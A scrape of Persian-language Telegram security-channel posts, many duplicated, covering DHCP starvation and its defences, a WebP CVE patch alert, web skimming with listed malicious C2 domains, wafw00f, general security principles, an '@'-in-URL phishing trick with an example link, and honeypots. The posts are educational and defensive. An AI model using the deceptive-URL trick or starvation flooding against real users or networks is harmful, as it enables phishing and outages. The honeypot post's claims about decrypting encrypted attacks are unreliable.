🔹 حالا آفر چیه؟ اینجاست که بستهای که برادکست شده و به همه ارسال شده یه نسخش میرسه دست DHCP Server و اونم میخواد اعلام کنه که بستت به دستم رسید و فهمیدم که آیپی میخوای. پس یه آیپی رو از تو Pool اش یا مخزن آیپیهاش برمیداره و برای این کلاینت رزرو میکنه و در جواب بسته دیسکاوری، بسته آفر رو با محتویاتِ: آیپیای که میخواد بهش پیشنهاد بده، مک کلاینت، مدت زمان رزرو آیپی، دیفالت گیت وی و دیاناس و سایر اطلاعات مورد نیاز کلاینت ارسال میکنه.
🔸 بستهی بعدی ریکوئسته که کلاینت میگه من این آیپیای که بهم پیشنهاد دادی توی آفر رو پسندیدم😅 و میخوامش. بهم اختصاص بده...
🔹 بستهی بعدی اکنالج هستش که تو این مرحله فرآیند آیپی دهی نهایی میشه و مواردی که تو مرحله آفر پیشنهاد داده بود رو نهایی میکنه و به کلاینت اختصاص میده.
🔸 خب میرسیم به جای جذابش که حالا ما چطوری از طریق دورا اتک میزنیم؟! 😎
- در اینجا اتکر میاد مک آدرس جعلی تولید میکنه و با هر کدوم از مکها یه بستهی دیسکاوری میفرسته و میگه به من آیپی بده، DHCP Server هم از Pool اش یا مخزن آیپیش دونه دونه آیپیهارو به مکهای جعلی اختصاص میده تا اینکه مخزنش خالی میشه و دیگه نمیتونه به دستگاههای واقعی شبکه آیپی اختصاص بده و اینجوری ارتباط کل دستگاههای موجود تو شبکه با همدیگه قطع میشه :)
- به این حمله DHCP Starvation گفته میشه. که در واقع مخزنمون خالی شده و گرسنش شده 🍔
🔹 حالا شاید سوال پیش بیاد راه حل جلوگیری ازش چیه؟!
- اگر درخواست آیپی با یک مکآدرس ثابت بود، باید با استفاده از تکنولوژی DHCP Snooping فیلتر MAC Address Check رو فعال کرد که در این حالت مکآدرس رو از هدر بسته میخونه و اگه تو زمان مشخص درخواست زیادی داد دراپش میکنه.
ولی اگه درخواست آیپی با مکهای مختلف اتفاق بیفته دیگه این راه حل جواب نمیده و میتونیم از یه مرحله قبل جلوشو بگیریم و Port Security رو فعال کنیم و بگیم فقط فلان مکآدرس امکان ارسال پکت از فلان پورت رو داره. و اینجوری اصلاً دستگاه دیگهای نمیتونه درخواست دیسکاوری بفرسته چه برسه که بخواد دریافت بشه و مکش چک بشه!
- و به همین راحتی مشکل حل میشه 😅
امیدوارم از این پست خوشتون اومده باشه 💜🧸
👤 Drwcsi
💎 Channel: @DevelopixNetwork
👍13🔥8❤2👎2
همین حالا Browser خودتونو آپدیت کنید⚠️
مرورگر های Edge-Chrome-Opera-Firefox-Brave آپدیتی رو برای بستن آسیب پذیری CVE-2023-4863 ارائه کردند.‼️
این آسیب پذیری، از طریق WebP که یک فرمت معروف برای رندر کردن تصاویر است امکان فعال شدن دارد و نه تنها خود Browser، بلکه ممکن است اپلیکیشن های نصب شده روی دستگاه رو هم تحت تاثیر قرار دهد.💀
به نظر میرسد تلگرام هم تحت تاثیر این قضیه قرار گرفته و آپدیتی رو اخیرا Release کرده.💣
#Security #CVE
👤 Drwcsi
💎 Channel: @DevelopixNetwork
مرورگر های Edge-Chrome-Opera-Firefox-Brave آپدیتی رو برای بستن آسیب پذیری CVE-2023-4863 ارائه کردند.‼️
این آسیب پذیری، از طریق WebP که یک فرمت معروف برای رندر کردن تصاویر است امکان فعال شدن دارد و نه تنها خود Browser، بلکه ممکن است اپلیکیشن های نصب شده روی دستگاه رو هم تحت تاثیر قرار دهد.💀
به نظر میرسد تلگرام هم تحت تاثیر این قضیه قرار گرفته و آپدیتی رو اخیرا Release کرده.💣
#Security #CVE
👤 Drwcsi
💎 Channel: @DevelopixNetwork
👍19👎1🔥1
🌀 حمله Skimming attack چیست؟ 🌀
🔸 در این حمله کدهای جاوااسکریپت آلوده به یک وب سایت تزریق میشوند تا بتوانند فرمهای html که کاربران در آنها دیتاها و اطلاعات احراز هویتی و مالی خود را وارد میکنند به سرقت ببرند. به تازگی یک متد جدید و غیر قابل تشخیص برای این نوع حمله ایجاد شده است به این صورت که کدهای javanoscript آلوده در قالب خطای 404 خود را مخفی می کنند. و زمانی که کاربر در حال پر کردن فیلدهای کارت اعتباری خود میباشد این کدهای آلوده شروع به سرقت آنها و ارسال آنها به سرور های C2 خود مینمایند. اگر در ترافیک شبکه خود یکی از دامنههای زیر را مشاهده کردید وبسایت شما به این نوع بدافزار آلوده شده است.
🔗 Pmdresearch com
🔗 secures-tool com
🔗 adsometric com
🔗 cngresearch com
👤 MHReza
💎 Channel: @DevelopixNetwork
🔸 در این حمله کدهای جاوااسکریپت آلوده به یک وب سایت تزریق میشوند تا بتوانند فرمهای html که کاربران در آنها دیتاها و اطلاعات احراز هویتی و مالی خود را وارد میکنند به سرقت ببرند. به تازگی یک متد جدید و غیر قابل تشخیص برای این نوع حمله ایجاد شده است به این صورت که کدهای javanoscript آلوده در قالب خطای 404 خود را مخفی می کنند. و زمانی که کاربر در حال پر کردن فیلدهای کارت اعتباری خود میباشد این کدهای آلوده شروع به سرقت آنها و ارسال آنها به سرور های C2 خود مینمایند. اگر در ترافیک شبکه خود یکی از دامنههای زیر را مشاهده کردید وبسایت شما به این نوع بدافزار آلوده شده است.
🔗 Pmdresearch com
🔗 secures-tool com
🔗 adsometric com
🔗 cngresearch com
👤 MHReza
💎 Channel: @DevelopixNetwork
👍13🔥2
🌀 معرفی ابزار wafw00f 🌀
🔸 فایروالهای وب اپلیکیشنها (WAFs) ابزارهای مهمی برای حفاظت از برنامههای وب در برابر انواع تهدیدات مختلف مانند حملات XSS، حملات SQL injection و سایر اشکال مخرب هستند. این ابزارها با تجزیه و تحلیل ترافیک ورودی به یک برنامه وب عمل میکنند و درخواستهایی که به نظر میرسد مخرب هستند را مسدود یا تغییر میدهند.
🔹یک ابزار که میتواند برای شناسایی حضور یک فایروال برنامه وب (WAF) استفاده شود، wafw00f است. wafw00f یک اسکریپت پایتون است که میتواند در شناسایی نوع WAF ای که یک برنامه وب را حفاظت میکند، استفاده شود.
🔗 لینک گیتهاب این ابزار
👤 MHReza
💎 Channel: @DevelopixNetwork
🔸 فایروالهای وب اپلیکیشنها (WAFs) ابزارهای مهمی برای حفاظت از برنامههای وب در برابر انواع تهدیدات مختلف مانند حملات XSS، حملات SQL injection و سایر اشکال مخرب هستند. این ابزارها با تجزیه و تحلیل ترافیک ورودی به یک برنامه وب عمل میکنند و درخواستهایی که به نظر میرسد مخرب هستند را مسدود یا تغییر میدهند.
🔹یک ابزار که میتواند برای شناسایی حضور یک فایروال برنامه وب (WAF) استفاده شود، wafw00f است. wafw00f یک اسکریپت پایتون است که میتواند در شناسایی نوع WAF ای که یک برنامه وب را حفاظت میکند، استفاده شود.
🔗 لینک گیتهاب این ابزار
👤 MHReza
💎 Channel: @DevelopixNetwork
👍6👎2
در دنیای مدرن ارتباطات، شبکهها نقش بسیار مهمی ایفا میکنند. از ارتباطات اینترنتی گرفته تا ارتباطات داخلی شرکتها، شبکهها به عنوان یک ابزار اساسی جهت انتقال دادهها و اطلاعات استفاده میشوند. با این حال، در مقابل این مزایای عظیم، شبکهها نیز با تهدیدات امنیتی مختلفی روبهرو هستند. به همین دلیل، امنیت شبکه به عنوان یکی از موضوعات کلیدی و حیاتی در دنیای فناوری اطلاعات و ارتباطات مورد توجه قرار گرفته است. در این پست، به بررسی تعریف امنیت شبکه و اهمیت آن خواهیم پرداخت.
🔹 تعریف امنیت شبکه
امنیت شبکه به عنوان تاکید بر حفاظت از دادهها، سیستمها، و ارتباطات شبکه در برابر تهدیدات، حملات و نفوذها تعریف میشود. این مفهوم شامل تدابیری است که گرفته میشود تا جلوی هر گونه دسترسی غیرمجاز به دادهها و تجهیزات شبکه گرفته شود و همچنین از تخریب، دستکاری و دسترسی غیرمجاز به منابع شبکه جلوگیری شود.
امنیت شبکه دربرگیرنده اصول و تکنیکهای متعددی است که برای حفاظت از شبکهها به کار میروند. این اصول شامل مسائلی از قبیل احراز هویت و اختیار دسترسی، رمزنگاری، تشخیص و پیشگیری از حملات، مانیتورینگ و لاگگیری، تهیه نسخه پشتیبان از دادهها، مدیریت تجهیزات شبکه، و تعیین سیاستها و استانداردهای امنیتی میباشد.
🔸 اهمیت امنیت شبکه
امنیت شبکه برای سازمانها و افراد بسیار حیاتی است. بدون امنیت شبکه، اطلاعات محرمانه و مهم میتوانند به سادگی در معرض دسترسی غیرمجاز قرار گیرند. علاوه بر این، حملات به شبکه میتوانند به تخریب سیستمها، سرقت اطلاعات حساس، و تخطی از اختیارات مجاز منجر شوند.
به عبارت دیگر، امنیت شبکه به سازمانها کمک میکند تا از سوانح مالی و سلامتی جلوگیری کنند و اعتماد مشتریان و کاربران خود را حفظ کنند. علاوه بر این، در دنیای متصل امروزی، تاثیرات یک حمله به شبکه میتواند از محدوده محلی به ابعاد جهانی گسترش یابد. بنابراین، امنیت شبکه نقش بسیار مهمی در حفظ امنیت فردی و جامعه ایفا میکند.
💎 Channel: @DevelopixNetwork
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8
تهدیدات امنیتی در شبکه ✍️
در دنیای متصل و دیجیتال امروز، تهدیدات امنیتی در شبکهها به یکی از اصلیترین چالشها برای سازمانها و افراد تبدیل شدهاند. توسعه فناوری و استفاده گسترده از اینترنت و شبکههای داخلی، تنوع و پیچیدگی تهدیدات را افزایش داده است. در این مقاله، به بررسی تهدیدات امنیتی در شبکه و انواع آنها میپردازیم.
🔹 تهدیدات امنیتی در شبکه
➖ حملات DDoS (Denial of Service):
حملات DDoS یکی از شایعترین تهدیدات امنیتی در شبکهها هستند. در این نوع حمله، حملهکننده با استفاده از بسیاری از دستگاهها یا برنامههای کمکی، سعی دارد سرور یا سرویسهای یک شبکه را با ترافیک بیشازحد بارگذاری کند تا منجر به قطعی از سرویسها شود.
➖ حملات Malware (نرمافزارهای مخرب):
نرمافزارهای مخرب نظیر ویروسها، تروجانها، و اسپایویرها تهدیداتی هستند که به صورت مخفی در سیستمها نفوذ میکنند و اطلاعات را دزدی میکنند یا سیستمها را تخریب میکنند.
➖ حملات فیشینگ (Phishing):
در این نوع حمله، حملهکننده تلاش میکند با استفاده از ایمیلها یا وبسایتهای مزور به کاربران انگیزه دهد که اطلاعات حساس خود را ارائه دهند. این اطلاعات معمولاً شامل نام کاربری و رمزعبور میشوند.
➖ نفوذ و تخریب:
حملهکنندگان میتوانند به طور غیرمجاز به شبکه نفوذ کرده و از داخل سیستمها و اطلاعات سرقت کنند یا سیستمها را تخریب کنند.
➖ حملات انکریپشن (رمزنگاری):
حملهکنندگان ممکن است با هدف شنود ارتباطات شبکه و دزدی اطلاعات از تکنیکهای رمزنگاری استفاده کنند. این تهدید مخاطرهآمیزی است که امنیت ارتباطات را تهدید میکند.
➖ حملات احراز هویت:
در این نوع حمله، حملهکننده تلاش میکند به نمایهها و حسابهای کاربری دیگران دسترسی پیدا کند و به عنوان آنها عمل کند. این تهدید میتواند به سرقت هویت و اعمال مجرمانه منجر شود.
تهدیدات امنیتی در شبکه از اهمیت بسیار زیادی برخوردارند. شبکهها با تنوع و پیچیدگی تهدیدات مواجه هستند که ممکن است به مشکلات جدی برای سازمانها و افراد منجر شوند. برای حفاظت از امنیت شبکه، افراد و سازمانها باید به شناخت تهدیدات امنیتی و انتخاب راهکارهای مناسب پرداخته و اقدامات امنیتی مناسب را اعمال کنند.
💎 Channel: @DevelopixNetwork
در دنیای متصل و دیجیتال امروز، تهدیدات امنیتی در شبکهها به یکی از اصلیترین چالشها برای سازمانها و افراد تبدیل شدهاند. توسعه فناوری و استفاده گسترده از اینترنت و شبکههای داخلی، تنوع و پیچیدگی تهدیدات را افزایش داده است. در این مقاله، به بررسی تهدیدات امنیتی در شبکه و انواع آنها میپردازیم.
حملات DDoS یکی از شایعترین تهدیدات امنیتی در شبکهها هستند. در این نوع حمله، حملهکننده با استفاده از بسیاری از دستگاهها یا برنامههای کمکی، سعی دارد سرور یا سرویسهای یک شبکه را با ترافیک بیشازحد بارگذاری کند تا منجر به قطعی از سرویسها شود.
نرمافزارهای مخرب نظیر ویروسها، تروجانها، و اسپایویرها تهدیداتی هستند که به صورت مخفی در سیستمها نفوذ میکنند و اطلاعات را دزدی میکنند یا سیستمها را تخریب میکنند.
در این نوع حمله، حملهکننده تلاش میکند با استفاده از ایمیلها یا وبسایتهای مزور به کاربران انگیزه دهد که اطلاعات حساس خود را ارائه دهند. این اطلاعات معمولاً شامل نام کاربری و رمزعبور میشوند.
حملهکنندگان میتوانند به طور غیرمجاز به شبکه نفوذ کرده و از داخل سیستمها و اطلاعات سرقت کنند یا سیستمها را تخریب کنند.
حملهکنندگان ممکن است با هدف شنود ارتباطات شبکه و دزدی اطلاعات از تکنیکهای رمزنگاری استفاده کنند. این تهدید مخاطرهآمیزی است که امنیت ارتباطات را تهدید میکند.
در این نوع حمله، حملهکننده تلاش میکند به نمایهها و حسابهای کاربری دیگران دسترسی پیدا کند و به عنوان آنها عمل کند. این تهدید میتواند به سرقت هویت و اعمال مجرمانه منجر شود.
تهدیدات امنیتی در شبکه از اهمیت بسیار زیادی برخوردارند. شبکهها با تنوع و پیچیدگی تهدیدات مواجه هستند که ممکن است به مشکلات جدی برای سازمانها و افراد منجر شوند. برای حفاظت از امنیت شبکه، افراد و سازمانها باید به شناخت تهدیدات امنیتی و انتخاب راهکارهای مناسب پرداخته و اقدامات امنیتی مناسب را اعمال کنند.
💎 Channel: @DevelopixNetwork
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4🔥4👎1
⭕️ ریدایرکت کردن یکی از اتک های خیلی ساده اما در عین حال مخرب میتونه باشه
به صورت کلی ریدایرکت کردن کاربری از سایتی به سایت دیگه یا از روتی به روت دیگه ما میتونیم کاربر رو به صفحه ای منتقل کنیم که بد افزار منتظر کاربره
❇️ این بخش خودش چند صحنه مختلف داره که یکیش میتونه دانلود یک فایل مخرب باشه میتونه اجرای کد های مخرب و... باشه
✅ خب سوال اینجاست که منه کاربر روی لینکی که هیچ اطلاعی از اون ندارم کلیک نمیکنم!
🦾 درواقع بله کار شما درسته و خیلی هم عالیه ولی یه راه ریز هم داره که میتونه یه سری از کاربر ها رو گم راه کنه
اون کار چی هست؟
⚜️ ما میتونیم با قرار دادن یک @ در URL یک سایتی بیایم شما رو ریدایرکت کنیم به صفحه ای که میخوایم
برای مثال :
✳️ https://digikala.com@github.com/matinsoleymni
خب همین جوری که معلومه انگار ما داریم میریم سایت دیجیکالا ولی درواقع شما وقتی روش کلیک کنید گیت هاب باز میشه !
این یه نوع اتک از اتک ها ریدایرکت هست که اگر هکر خفنی پشت این ماجرا باشه میتونه با ترکیب این و چند روش دیگه خیلی ساده کاربر رو مورد اتک قرار بده !
👤 Matin Soleymani
💎 Channel: @DevelopixNetwork
به صورت کلی ریدایرکت کردن کاربری از سایتی به سایت دیگه یا از روتی به روت دیگه ما میتونیم کاربر رو به صفحه ای منتقل کنیم که بد افزار منتظر کاربره
❇️ این بخش خودش چند صحنه مختلف داره که یکیش میتونه دانلود یک فایل مخرب باشه میتونه اجرای کد های مخرب و... باشه
✅ خب سوال اینجاست که منه کاربر روی لینکی که هیچ اطلاعی از اون ندارم کلیک نمیکنم!
🦾 درواقع بله کار شما درسته و خیلی هم عالیه ولی یه راه ریز هم داره که میتونه یه سری از کاربر ها رو گم راه کنه
اون کار چی هست؟
⚜️ ما میتونیم با قرار دادن یک @ در URL یک سایتی بیایم شما رو ریدایرکت کنیم به صفحه ای که میخوایم
برای مثال :
✳️ https://digikala.com@github.com/matinsoleymni
خب همین جوری که معلومه انگار ما داریم میریم سایت دیجیکالا ولی درواقع شما وقتی روش کلیک کنید گیت هاب باز میشه !
این یه نوع اتک از اتک ها ریدایرکت هست که اگر هکر خفنی پشت این ماجرا باشه میتونه با ترکیب این و چند روش دیگه خیلی ساده کاربر رو مورد اتک قرار بده !
👤 Matin Soleymani
💎 Channel: @DevelopixNetwork
👍17❤2🔥1
امنیت شبکه از اهمیت بسیار بالایی در دنیای مدرن برخوردار است. با افزایش استفاده از شبکهها و اتصال دستگاهها به اینترنت، نیاز به اصول عمومی امنیت شبکه به ویژه مهم است. در این مقاله، به بررسی اصول عمومی امنیت شبکه و چگونگی پیادهسازی آنها میپردازیم.
اصول عمومی امنیت شبکه✍️
➖ حفاظت از مرزها (Perimeter Security):
این اصل شامل تدابیری میشود که جلوی دسترسی به دستگاهها و منابع شبکه از خارج را میگیرند. ابزارهایی نظیر فایروالها و IDS/IPS به جلوگیری از حملات از خارج از شبکه کمک میکنند.
➖ احراز هویت (Authentication):
تشخیص و تایید هویت کاربران و دستگاهها از طریق نام کاربری و رمز عبور یا سایر وسایل تایید هویت انجام میشود. این اصل از جلوگیری از دسترسی غیرمجاز به منابع شبکه محافظت میکند.
➖ اختیار دسترسی (Authorization):
بعد از احراز هویت، تایید اختیار دسترسی به منابع شبکه از طریق مجوزها و نقشها انجام میشود. این اصل به محافظت از منابع در مقابل دسترسی غیرمجاز کمک میکند.
➖ رمزنگاری (Encryption):
اطلاعات حساس و ارتباطات شبکه باید به وسیله رمزنگاری محافظت شوند تا از دسترسی غیرمجاز جلوگیری شود. رمزنگاری دادهها اطلاعات را در صورتی که به دست غیرمجازیان بیفتد، غیرقابل فهم میکند.
➖ مانیتورینگ و لاگگیری (Monitoring and Logging):
نظارت بر روی فعالیتهای شبکه و نگهداری لاگهای رویدادها برای تشخیص حملات و نقاط ضعف شبکه ضرور است. این اصل به سرعت تشخیص و پاسخ به تهدیدات امنیتی کمک میکند.
➖ بهروزرسانی و مدیریت پچها (Patch Management):
نرمافزارها و سیستمعاملها باید بهروز نگهداشته شوند تا آسیبپذیریها و نقاط ضعف جدیدی که ممکن است توسط تهدیدات امنیتی استفاده شوند، معالجه شوند.
➖ آموزش و آگاهی (Education and Awareness):
آموزش کاربران و افزایش آگاهی آنها از تهدیدات امنیتی و رفتارهای امنیتی میتواند از مهمترین عوامل پیشگیری در برابر حملات باشد.
اصول عمومی امنیت شبکه اساسیترین مباحثی هستند که برای حفاظت از شبکهها لازم است رعایت شوند. این اصول مشتمل بر تدابیری هستند که از تهدیدات امنیتی در برابر شبکه محافظت میکنند و در جلوگیری از حملات سایبری و دسترسی غیرمجاز به منابع شبکه ایفا میکنند. از اهمیت بسیار بالایی برخوردارند و تاکید بر آنها میتواند به افزایش امنیت شبکه کمک کند.
💎 Channel: @DevelopixNetwork
اصول عمومی امنیت شبکه
این اصل شامل تدابیری میشود که جلوی دسترسی به دستگاهها و منابع شبکه از خارج را میگیرند. ابزارهایی نظیر فایروالها و IDS/IPS به جلوگیری از حملات از خارج از شبکه کمک میکنند.
تشخیص و تایید هویت کاربران و دستگاهها از طریق نام کاربری و رمز عبور یا سایر وسایل تایید هویت انجام میشود. این اصل از جلوگیری از دسترسی غیرمجاز به منابع شبکه محافظت میکند.
بعد از احراز هویت، تایید اختیار دسترسی به منابع شبکه از طریق مجوزها و نقشها انجام میشود. این اصل به محافظت از منابع در مقابل دسترسی غیرمجاز کمک میکند.
اطلاعات حساس و ارتباطات شبکه باید به وسیله رمزنگاری محافظت شوند تا از دسترسی غیرمجاز جلوگیری شود. رمزنگاری دادهها اطلاعات را در صورتی که به دست غیرمجازیان بیفتد، غیرقابل فهم میکند.
نظارت بر روی فعالیتهای شبکه و نگهداری لاگهای رویدادها برای تشخیص حملات و نقاط ضعف شبکه ضرور است. این اصل به سرعت تشخیص و پاسخ به تهدیدات امنیتی کمک میکند.
نرمافزارها و سیستمعاملها باید بهروز نگهداشته شوند تا آسیبپذیریها و نقاط ضعف جدیدی که ممکن است توسط تهدیدات امنیتی استفاده شوند، معالجه شوند.
آموزش کاربران و افزایش آگاهی آنها از تهدیدات امنیتی و رفتارهای امنیتی میتواند از مهمترین عوامل پیشگیری در برابر حملات باشد.
اصول عمومی امنیت شبکه اساسیترین مباحثی هستند که برای حفاظت از شبکهها لازم است رعایت شوند. این اصول مشتمل بر تدابیری هستند که از تهدیدات امنیتی در برابر شبکه محافظت میکنند و در جلوگیری از حملات سایبری و دسترسی غیرمجاز به منابع شبکه ایفا میکنند. از اهمیت بسیار بالایی برخوردارند و تاکید بر آنها میتواند به افزایش امنیت شبکه کمک کند.
💎 Channel: @DevelopixNetwork
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6❤1👎1
| کانال امنیت و شبکه |
🍯Honey pot 👤 Drwcsi 💎 Channel: @DevelopixNetwork
خب سلام😊 ؛ قراره که از یه مبحث شیرین به نام عسل شروع کنیم...
🔹همیشه شیرینی عسل مارو به سمت خودش جذب میکنه😋🍯 میریم سمتش و یه عالمه میخوریم و میگیم برای سلامتی خوبه، و بعد از تموم شدنش میبینیم که بعلهه! اصل نبوده و حالا ما موندیم و اضافه وزن حاصل از شکرایی که به اسم عسل بهمون غالب شده😑
🌐از قضا، تو شبکه هم همچین مبحثی داریم، یه ظرف عسل میزارن لبهی شبکه و باهاش نفوذگرارو گیر میندازن😅
🔹در واقع این مکانیزم که اسمش Honeypot هست، خودشو جای سرویس های شبکه جا میزنه و مهاجمارو جذب خودش میکنه، مهاجما که فکر میکنن به سرویسهای واقعی دسترسی پیدا کردن، در اصل تو دام هانی پات افتادن!
میشه گفت این مکانیزم هدفش اینه که ازش استفاده غیر مجاز بشه تا مهاجمارو گیر بندازه 😅 و هیچ سرویس واقعیای روی اون ران نیست.
✅حالا خوبیایی که هانی پات داره چیه؟!
1️⃣ اینکه هر تعاملی که باهاش برقرار بشه، دقیقا نشون دهندهی یه حملست! مابقی مکانیزم ها از قبیل فایروال ها، یه حجم انبوهی از لاگ و خطارو تولید میکنن و تفکیک حملات واقعی از بین اونها سخته، اما هانی پات تشخیص دقیقی داره و حملات واقعی رو به دام میندازه!
2️⃣ حتی حملات رمزگذاری شدهای که مثلا میتونن تحت پروتکل هایی مثل SSL و SSH و IP Sec باشن رو رمزگشایی میکنه. چرا؟! چون مهاجما فکر کردن سرویس واقعی رانه و مکانیزم هانی پاتو به عنوان مقصد نهایی که میتونه رمزگشایی کنه قرار دادن :)
3️⃣ به حداقل منابع نیاز دارن، حتی میشه با یه سی پی یو پنتیوم ساده روی هزاران آیپی نظارت کرد 😅
❌حالا معایبش چیه و چطور از HoneyToken برای لاپوشونی معایبش استفاده میکنیم؟
🔹یه بدی ای که داره اینه که حملات باید مستقیما روی خودش انجام بشه تا بتونه شناسایی کنه، اگه رو مابقی بخشهای شبکه حملهای اتفاق بیفته، هانی پات متوجه اون نمیشه!
🔹حالا ما چیکار میکنیم؟ همهی ترافیک هارو از هانی پات عبور میدیم تا اگه اتفاقی افتاد بتونیم متوجهش بشیم و این قضیه به کمک توکنِ هانی پات پیاده سازی میشه...
📶 تفاوتش با فایروال رو هم بگیم و تمام!
🔹در واقع فایروال هدفش دور نگه داشتن مهاجمانه ولی هانی پات برای ترغیب هکرها برای حمله بهمون ساخته شده! برای چی خب؟! برای اینکه هانی پات هدفش اینه بدونه هکرها به کدوم پورت ها و حملات بیشتر علاقمندن😅 تا بتونیم روی اونها نظارت بیشتری بکنیم.
🔹و در نهایت امیدوارم براتون مفید بوده باشه و ادمین های شبکه به فکر کانفیگش افتاده باشن و نفوذگرها بفکر دور زدنش🙃🕷
👤 Drwcsi
💎 Channel: @DevelopixNetwork
🔹همیشه شیرینی عسل مارو به سمت خودش جذب میکنه😋🍯 میریم سمتش و یه عالمه میخوریم و میگیم برای سلامتی خوبه، و بعد از تموم شدنش میبینیم که بعلهه! اصل نبوده و حالا ما موندیم و اضافه وزن حاصل از شکرایی که به اسم عسل بهمون غالب شده
🌐از قضا، تو شبکه هم همچین مبحثی داریم، یه ظرف عسل میزارن لبهی شبکه و باهاش نفوذگرارو گیر میندازن😅
🔹در واقع این مکانیزم که اسمش Honeypot هست، خودشو جای سرویس های شبکه جا میزنه و مهاجمارو جذب خودش میکنه، مهاجما که فکر میکنن به سرویسهای واقعی دسترسی پیدا کردن، در اصل تو دام هانی پات افتادن!
میشه گفت این مکانیزم هدفش اینه که ازش استفاده غیر مجاز بشه تا مهاجمارو گیر بندازه 😅 و هیچ سرویس واقعیای روی اون ران نیست.
✅حالا خوبیایی که هانی پات داره چیه؟!
❌حالا معایبش چیه و چطور از HoneyToken برای لاپوشونی معایبش استفاده میکنیم؟
🔹یه بدی ای که داره اینه که حملات باید مستقیما روی خودش انجام بشه تا بتونه شناسایی کنه، اگه رو مابقی بخشهای شبکه حملهای اتفاق بیفته، هانی پات متوجه اون نمیشه!
🔹حالا ما چیکار میکنیم؟ همهی ترافیک هارو از هانی پات عبور میدیم تا اگه اتفاقی افتاد بتونیم متوجهش بشیم و این قضیه به کمک توکنِ هانی پات پیاده سازی میشه...
🔹در واقع فایروال هدفش دور نگه داشتن مهاجمانه ولی هانی پات برای ترغیب هکرها برای حمله بهمون ساخته شده! برای چی خب؟! برای اینکه هانی پات هدفش اینه بدونه هکرها به کدوم پورت ها و حملات بیشتر علاقمندن😅 تا بتونیم روی اونها نظارت بیشتری بکنیم.
🔹و در نهایت امیدوارم براتون مفید بوده باشه و ادمین های شبکه به فکر کانفیگش افتاده باشن و نفوذگرها بفکر دور زدنش🙃🕷
👤 Drwcsi
💎 Channel: @DevelopixNetwork
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥14👍5